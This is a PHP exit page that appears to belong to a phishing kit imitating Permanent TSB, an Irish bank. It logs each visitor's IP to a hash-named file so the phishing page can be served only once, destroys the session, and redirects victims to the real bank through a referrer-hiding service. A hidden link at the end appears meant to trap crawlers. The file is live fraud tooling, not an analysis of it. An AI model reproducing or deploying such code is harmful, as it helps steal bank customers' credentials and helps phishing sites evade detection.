<?php
require('../CONFIG.php');
session_start();

if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
  }
  elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  }
  else {
    $ip = $_SERVER['REMOTE_ADDR'];
  }
  
if($One_Time_Access == "on"){
    file_put_contents('../2617d44145d0300cdf70349b2f3cac79.txt', $ip . PHP_EOL, FILE_APPEND);
}

session_destroy();
header("Location: https://href.li/?https://permanenttsb.ie/");

?>
<a rel="nofollow" style="display:none;" href="vendor/" title="Do NOT follow this link or you will be banned from the site!">Do NOT follow this link or you will be banned from the site!</a>